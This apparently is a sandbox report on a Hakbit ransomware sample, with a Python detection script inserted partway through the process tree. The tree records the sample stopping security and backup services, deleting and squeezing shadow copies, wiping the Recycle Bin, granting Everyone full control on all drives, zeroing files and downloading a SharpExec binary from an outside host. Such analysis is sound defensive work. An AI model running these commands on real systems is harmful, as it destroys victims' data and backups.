Resubmissions

17-11-2020 12:01

201117-yzjn4s5cdn 10

18-06-2020 04:28

200618-tg948yvz5n 10

Analysis

  • max time kernel
    139s
  • max time network
    97s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    18-06-2020 04:28

General

  • Target

    System.exe

  • Size

    66KB

  • MD5

    8d6ab03994b0ce3466873aa7532fe76b

  • SHA1

    156aecd4d8e65d205181ad5eace466c8798d3c86

  • SHA256

    e5242266d9fc1e27e583a920ff6b9ff445c0942793ed80a92d5c5b6792d25f62

  • SHA512

    2c1df9fb201b4a750378dfa7029755239167efa51ae4ddc9c5042218a1d01c3bf5557c09faeda4f3f68818082a6f95526d5776d432b5b6774ae2c1c90dc7a84c

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 390 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Drops startup file 1 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Modifies file permissions 1 TTPs 29 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Deletes itself 1 IoCs
  • Interacts with shadow copies 2 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies service 2 TTPs 5 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\System.exe
    "C:\Users\Admin\AppData\Local\Temp\System.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Suspicious use of SendNotifyMessage
    • Drops startup file
    • Modifies WinLogon
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of AdjustPrivilegeToken
    PID:1312
    • C:\Windows\system32\net.exe
      "net.exe" stop avpsus /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1480
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop avpsus /y
        3⤵
        PID:544
    • C:\Windows\system32\net.exe
      "net.exe" stop McAfeeDLPAgentService /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1012
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
        3⤵
        PID:1612
    • C:\Windows\system32\net.exe
      "net.exe" stop mfewc /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:240
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop mfewc /y
        3⤵
        PID:1068
    • C:\Windows\system32\net.exe
      "net.exe" stop BMR Boot Service /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1088
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BMR Boot Service /y
        3⤵
        PID:1520
    • C:\Windows\system32\net.exe
      "net.exe" stop NetBackup BMR MTFTP Service /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1668
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
        3⤵
        PID:1360
    • C:\Windows\system32\net.exe
      "net.exe" stop DefWatch /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1764
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop DefWatch /y
        3⤵
        PID:1824
    • C:\Windows\system32\net.exe
      "net.exe" stop ccEvtMgr /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1836
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ccEvtMgr /y
        3⤵
        PID:1844
    • C:\Windows\system32\net.exe
      "net.exe" stop ccSetMgr /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1788
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop ccSetMgr /y
        3⤵
        PID:1768
    • C:\Windows\system32\net.exe
      "net.exe" stop SavRoam /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:652
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop SavRoam /y
        3⤵
        PID:864
    • C:\Windows\system32\net.exe
      "net.exe" stop RTVscan /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:984
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop RTVscan /y
        3⤵
        PID:616
    • C:\Windows\system32\net.exe
      "net.exe" stop QBFCService /y
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1316
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop QBFCService /y
        3⤵
        PID:1624
    • C:\Windows\system32\net.exe
      "net.exe" stop QBIDPService /y
      2⤵
      PID:1592
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop QBIDPService /y
        3⤵
        PID:1636
    • C:\Windows\system32\net.exe
      "net.exe" stop Intuit.QuickBooks.FCS /y
      2⤵
      PID:1620
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
        3⤵
        PID:1896
    • C:\Windows\system32\net.exe
      "net.exe" stop QBCFMonitorService /y
      2⤵
      PID:1948
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop QBCFMonitorService /y
        3⤵
        PID:1888
    • C:\Windows\system32\net.exe
      "net.exe" stop YooBackup /y
      2⤵
      PID:1892
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop YooBackup /y
        3⤵
        PID:1968
    • C:\Windows\system32\net.exe
      "net.exe" stop YooIT /y
      2⤵
      PID:1980
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop YooIT /y
        3⤵
        PID:2028
    • C:\Windows\system32\net.exe
      "net.exe" stop zhudongfangyu /y
      2⤵
      PID:856
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop zhudongfangyu /y
        3⤵
        PID:1200
    • C:\Windows\system32\net.exe
      "net.exe" stop stc_raw_agent /y
      2⤵
      PID:1104
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop stc_raw_agent /y
        3⤵
        PID:1484
    • C:\Windows\system32\net.exe
      "net.exe" stop VSNAPVSS /y
      2⤵
      PID:1492
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VSNAPVSS /y
        3⤵
        PID:1572
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamTransportSvc /y
      2⤵
      PID:836
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamTransportSvc /y
        3⤵
        PID:1612
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamDeploymentService /y
      2⤵
      PID:848
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamDeploymentService /y
        3⤵
        PID:324
    • C:\Windows\system32\net.exe
      "net.exe" stop VeeamNFSSvc /y
      2⤵
      PID:1064
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop VeeamNFSSvc /y
        3⤵
        PID:1524
    • C:\Windows\system32\net.exe
      "net.exe" stop veeam /y
      2⤵
      PID:1376
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop veeam /y
        3⤵
        PID:1380
    • C:\Windows\system32\net.exe
      "net.exe" stop PDVFSService /y
      2⤵
      PID:1816
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop PDVFSService /y
        3⤵
        PID:1828
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecVSSProvider /y
      2⤵
      PID:1792
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecVSSProvider /y
        3⤵
        PID:1784
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentAccelerator /y
      2⤵
      PID:1768
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
        3⤵
        PID:568
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecAgentBrowser /y
      2⤵
      PID:368
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
        3⤵
        PID:1516
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecDiveciMediaService /y
      2⤵
      PID:300
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
        3⤵
        PID:1624
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecJobEngine /y
      2⤵
      PID:1256
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecJobEngine /y
        3⤵
        PID:1600
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecManagementService /y
      2⤵
      PID:1564
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecManagementService /y
        3⤵
        PID:1568
    • C:\Windows\system32\net.exe
      "net.exe" stop BackupExecRPCService /y
      2⤵
      PID:1908
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop BackupExecRPCService /y
        3⤵
        PID:1900
    • C:\Windows\system32\net.exe
      "net.exe" stop AcrSch2Svc /y
      2⤵
      PID:1984
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcrSch2Svc /y
        3⤵
        PID:1972
    • C:\Windows\system32\net.exe
      "net.exe" stop AcronisAgent /y
      2⤵
      PID:2032
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop AcronisAgent /y
        3⤵
        PID:1100
    • C:\Windows\system32\net.exe
      "net.exe" stop CASAD2DWebSvc /y
      2⤵
      PID:1200
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop CASAD2DWebSvc /y
        3⤵
        PID:1488
    • C:\Windows\system32\net.exe
      "net.exe" stop CAARCUpdateSvc /y
      2⤵
      PID:1084
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop CAARCUpdateSvc /y
        3⤵
        PID:544
    • C:\Windows\system32\net.exe
      "net.exe" stop sophos /y
      2⤵
      PID:1060
      • C:\Windows\system32\net1.exe
        C:\Windows\system32\net1 stop sophos /y
        3⤵
        PID:1612
    • C:\Windows\system32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      2⤵
      PID:1616
    • C:\Windows\system32\sc.exe
      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
      2⤵
      PID:1068
    • C:\Windows\system32\sc.exe
      "sc.exe" config SQLWriter start= disabled
      2⤵
      PID:1092
    • C:\Windows\system32\sc.exe
      "sc.exe" config SstpSvc start= disabled
      2⤵
      PID:1380
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mspub.exe /F
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Kills process with taskkill
      PID:1852
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopqos.exe /F
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Kills process with taskkill
      PID:1324
    • C:\Windows\system32\taskkill.exe
      "taskkill.exe" /IM mydesktopservice.exe /F
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      • Kills process with taskkill
      PID:1000
    • C:\Windows\system32\vssadmin.exe
      "vssadmin.exe" Delete Shadows /all /quiet
      2⤵
      • Interacts with shadow copies
      PID:1936
    • C:\Windows\system32\vssadmin.exe
      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
      2⤵
      • Interacts with shadow copies
      PID:1116
    • C:\Windows\system32\vssadmin.exe
      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
      2⤵
      • Interacts with shadow copies
      PID:780
    • C:\Windows\system32\vssadmin.exe
      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
      2⤵
      • Interacts with shadow copies
                                                                                                                                        PID:744
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1212
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:520
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1624
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1632
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:2028
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:212
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1556
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1044
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1508
                                                                                                                                      • C:\Windows\system32\vssadmin.exe
                                                                                                                                        "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                        2⤵
                                                                                                                                        • Interacts with shadow copies
                                                                                                                                        PID:1524
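A detection pass over the command lines in this process tree, added here as an example and not part of the sandbox report or of the sample itself. It flags the `vssadmin Delete Shadows` calls, the per-volume shrink-then-unbounded `resize shadowstorage` pairs (shrinking the storage association below the space already in use makes VSS discard shadow copies that no longer fit, so the pair deletes them even where a direct delete is blocked or audited), the recursive `Everyone:F` grants, the forced `taskkill` and the `$Recycle.bin` wipe. The event tuples are constructed from the tree above; the `Finding` type and the rule names are this example's own and not from any vendor schema.

```python
import re
from dataclasses import dataclass

# Constructed sample: (image name, command line) pairs taken from the sandbox
# process tree, in execution order. Every one is a child of System.exe.
SAMPLE_EVENTS = [
    ('taskkill.exe', '"taskkill.exe" /IM mydesktopservice.exe /F'),
    ('vssadmin.exe', '"vssadmin.exe" Delete Shadows /all /quiet'),
    ('vssadmin.exe', '"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB'),
    ('vssadmin.exe', '"vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded'),
    ('vssadmin.exe', '"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB'),
    ('vssadmin.exe', '"vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded'),
    ('vssadmin.exe', '"vssadmin.exe" Delete Shadows /all /quiet'),
    ('cmd.exe', r'"cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin'),
    ('icacls.exe', r'"icacls.exe" D:\* /grant Everyone:F /T /C /Q'),
    ('icacls.exe', r'"icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q'),
]


@dataclass(frozen=True)
class Finding:
    rule: str      # hypothetical rule name, chosen for this example
    cmdline: str   # the command line(s) that triggered it


def _argv(cmdline):
    """Whitespace-split a Windows command line and drop surrounding quotes.

    Sufficient for these command lines (no quoted arguments containing spaces).
    """
    return [a.strip('"') for a in cmdline.split()]


def analyze(events):
    """Return a list of Finding objects for the recovery-inhibition and
    permission-tampering patterns seen in the tree."""
    findings = []
    # volume -> the resize command that last shrank its shadow storage;
    # a following resize to 'unbounded' on the same volume completes the squeeze
    shrunk = {}
    for image, cmdline in events:
        image = image.lower()
        args = [a.lower() for a in _argv(cmdline)[1:]]

        if image == 'vssadmin.exe':
            if args[:2] == ['delete', 'shadows']:
                findings.append(Finding('vss_delete_shadows', cmdline))
            elif args[:2] == ['resize', 'shadowstorage']:
                opts = dict(a[1:].split('=', 1)
                            for a in args[2:] if a.startswith('/') and '=' in a)
                vol = opts.get('for')
                if opts.get('maxsize', '') != 'unbounded':
                    shrunk[vol] = cmdline            # shrink: remember it
                elif vol in shrunk:                  # shrink then unbounded
                    findings.append(Finding('vss_storage_squeeze',
                                            shrunk.pop(vol) + ' -> ' + cmdline))

        elif image == 'icacls.exe':
            # recursive (/T) full-control grant to Everyone on a whole tree
            if '/grant' in args and '/t' in args and \
                    any(a.startswith('everyone:f') for a in args):
                findings.append(Finding('icacls_everyone_full', cmdline))

        elif image == 'taskkill.exe' and '/f' in args:
            findings.append(Finding('taskkill_force', cmdline))

        elif image == 'cmd.exe' and 'rd' in args and '/s' in args and \
                any('$recycle.bin' in a for a in args):
            findings.append(Finding('recycle_bin_wipe', cmdline))

    return findings


def triggered_rules(events):
    """The distinct rule names fired by a sequence of events."""
    return {f.rule for f in analyze(events)}


if __name__ == '__main__':
    for f in analyze(SAMPLE_EVENTS):
        print(f'{f.rule:24} {f.cmdline}')
```

The squeeze rule keys on the shrink/unbounded pair per volume rather than on `resize shadowstorage` alone, so a single administrative resize does not fire it; the page's sample runs the pair on c: through h: and brackets the whole sequence with two `Delete Shadows /all /quiet` calls, which is why both rules fire here.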
    • C:\Windows\system32\cmd.exe
      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
      2⤵
      PID:1848
    • C:\Windows\system32\arp.exe
      "arp" -a
      2⤵
      PID:1600
    • C:\Windows\system32\icacls.exe
      "icacls.exe" A:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:608
    • C:\Windows\system32\icacls.exe
      "icacls.exe" B:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:236
    • C:\Windows\system32\icacls.exe
      "icacls.exe" D:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1040
    • C:\Windows\system32\icacls.exe
      "icacls.exe" E:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:872
    • C:\Windows\system32\icacls.exe
      "icacls.exe" F:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1612
    • C:\Windows\system32\icacls.exe
      "icacls.exe" G:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1504
    • C:\Windows\system32\icacls.exe
      "icacls.exe" H:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1804
    • C:\Windows\system32\icacls.exe
      "icacls.exe" I:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1828
    • C:\Windows\system32\icacls.exe
      "icacls.exe" J:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1932
    • C:\Windows\system32\icacls.exe
      "icacls.exe" K:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:216
    • C:\Windows\system32\icacls.exe
      "icacls.exe" L:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1560
    • C:\Windows\system32\icacls.exe
      "icacls.exe" M:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:748
    • C:\Windows\system32\icacls.exe
      "icacls.exe" N:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1080
    • C:\Windows\system32\icacls.exe
      "icacls.exe" O:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1516
    • C:\Windows\system32\icacls.exe
      "icacls.exe" P:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1056
    • C:\Windows\system32\icacls.exe
      "icacls.exe" Q:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1544
    • C:\Windows\system32\icacls.exe
      "icacls.exe" R:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:544
    • C:\Windows\system32\icacls.exe
      "icacls.exe" S:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1696
    • C:\Windows\system32\icacls.exe
      "icacls.exe" T:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1292
    • C:\Windows\system32\icacls.exe
      "icacls.exe" U:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:632
    • C:\Windows\system32\icacls.exe
      "icacls.exe" V:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1108
    • C:\Windows\system32\icacls.exe
      "icacls.exe" W:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1824
    • C:\Windows\system32\icacls.exe
      "icacls.exe" X:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1308
    • C:\Windows\system32\icacls.exe
      "icacls.exe" Y:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:232
    • C:\Windows\system32\icacls.exe
      "icacls.exe" Z:\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1208
    • C:\Windows\system32\icacls.exe
      "icacls.exe" C:\Users\Admin\Desktop\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1008
    • C:\Windows\system32\icacls.exe
      "icacls.exe" C:\Users\Admin\Documents\* /grant Everyone:F /T /C /Q
      2⤵
      • Modifies file permissions
      PID:1104
    • C:\Windows\system32\icacls.exe
      "icacls.exe" C:\Users\Admin\Pictures\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:872
                                                                                                                                          • C:\Windows\system32\icacls.exe
                                                                                                                                            "icacls.exe" C:\Users\Admin\* /grant Everyone:F /T /C /Q
                                                                                                                                            2⤵
                                                                                                                                            • Modifies file permissions
                                                                                                                                            PID:324
                                                                                                                                          • C:\Windows\System32\notepad.exe
                                                                                                                                            "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HELP_ME_RECOVER_MY_FILES.txt
                                                                                                                                            2⤵
                                                                                                                                            • Opens file in notepad (likely ransom note)
                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                            PID:1292
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                            2⤵
                                                                                                                                              PID:364
                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                ping 127.0.0.7 -n 3
                                                                                                                                                3⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:1104
                                                                                                                                              • C:\Windows\system32\fsutil.exe
                                                                                                                                                fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                3⤵
                                                                                                                                                  PID:1576
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\System.exe
                                                                                                                                                2⤵
                                                                                                                                                • Deletes itself
                                                                                                                                                PID:324
                                                                                                                                                • C:\Windows\system32\choice.exe
                                                                                                                                                  choice /C Y /N /D Y /T 3
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2012
                                                                                                                                              • C:\Windows\system32\vssvc.exe
                                                                                                                                                C:\Windows\system32\vssvc.exe
                                                                                                                                                1⤵
                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                • Modifies service
                                                                                                                                                PID:2004
                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                "C:\Windows\explorer.exe"
                                                                                                                                                1⤵
                                                                                                                                                  PID:1764
                                                                                                                                                • C:\Windows\explorer.exe
                                                                                                                                                  "C:\Windows\explorer.exe"
                                                                                                                                                  1⤵
                                                                                                                                                    PID:1896

                                                                                                                                                  Network

                                                                                                                                                  • flag-unknown
                                                                                                                                                    DNS
                                                                                                                                                    www.google.com
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    www.google.com
                                                                                                                                                    IN A
                                                                                                                                                    Response
                                                                                                                                                    www.google.com
                                                                                                                                                    IN A
                                                                                                                                                    172.217.168.196
                                                                                                                                                  • flag-unknown
                                                                                                                                                    GET
                                                                                                                                                    https://www.google.com/
                                                                                                                                                    System.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    172.217.168.196:443
                                                                                                                                                    Request
                                                                                                                                                    GET / HTTP/1.1
                                                                                                                                                    Host: www.google.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Response
                                                                                                                                                    HTTP/1.1 200 OK
                                                                                                                                                    Date: Thu, 18 Jun 2020 04:28:28 GMT
                                                                                                                                                    Expires: -1
                                                                                                                                                    Cache-Control: private, max-age=0
                                                                                                                                                    Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                    Server: gws
                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                    Set-Cookie: 1P_JAR=2020-06-18-04; expires=Sat, 18-Jul-2020 04:28:28 GMT; path=/; domain=.google.com; Secure
                                                                                                                                                    Set-Cookie: NID=204=lkSGaelz_W94W5dxgyTcPERbkrypR39V5aOmj-1_5TucLSrZoaqwBxcW5q8cdl1nUH4_8g5sWMzO5JJeAKgYqP35VeAZvAM1PfGYwO4UgIreA9lRPARh8avC0REFHY1-Mvo3CGKSe9o9y5tWOxxQr2Wuu3slnq7zpatIbu8UwDk; expires=Fri, 18-Dec-2020 04:28:28 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                    Alt-Svc: h3-28=":443"; ma=2592000,h3-27=":443"; ma=2592000,h3-25=":443"; ma=2592000,h3-T050=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q049=":443"; ma=2592000,h3-Q048=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                  • flag-unknown
                                                                                                                                                    DNS
                                                                                                                                                    raw.githubusercontent.com
                                                                                                                                                    Remote address:
                                                                                                                                                    8.8.8.8:53
                                                                                                                                                    Request
                                                                                                                                                    raw.githubusercontent.com
                                                                                                                                                    IN A
                                                                                                                                                    Response
                                                                                                                                                    raw.githubusercontent.com
                                                                                                                                                    IN CNAME
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    IN A
                                                                                                                                                    151.101.0.133
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    IN A
                                                                                                                                                    151.101.64.133
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    IN A
                                                                                                                                                    151.101.128.133
                                                                                                                                                    github.map.fastly.net
                                                                                                                                                    IN A
                                                                                                                                                    151.101.192.133
                                                                                                                                                  • flag-unknown
                                                                                                                                                    GET
                                                                                                                                                    https://raw.githubusercontent.com/anthemtotheego/SharpExec/master/CompiledBinaries/SharpExec_x64.exe
                                                                                                                                                    System.exe
                                                                                                                                                    Remote address:
                                                                                                                                                    151.101.0.133:443
                                                                                                                                                    Request
                                                                                                                                                    GET /anthemtotheego/SharpExec/master/CompiledBinaries/SharpExec_x64.exe HTTP/1.1
                                                                                                                                                    Host: raw.githubusercontent.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Response
                                                                                                                                                    HTTP/1.1 200 OK
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Content-Length: 30208
                                                                                                                                                    Cache-Control: max-age=300
                                                                                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                    ETag: "09822efabd3bbaa686b5421bf7717e3af0ec3c41e47f45c9e6b720437f9c69b7"
                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-Frame-Options: deny
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Via: 1.1 varnish (Varnish/6.0)
                                                                                                                                                    X-GitHub-Request-Id: CCC0:1BE9:370770:43DDBD:5EEADE79
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Date: Thu, 18 Jun 2020 04:28:29 GMT
                                                                                                                                                    Via: 1.1 varnish
                                                                                                                                                    X-Served-By: cache-ams21059-AMS
                                                                                                                                                    X-Cache: HFM, HIT
                                                                                                                                                    X-Cache-Hits: 0, 1
                                                                                                                                                    X-Timer: S1592454510.542984,VS0,VE1
                                                                                                                                                    Vary: Authorization,Accept-Encoding
                                                                                                                                                    Access-Control-Allow-Origin: *
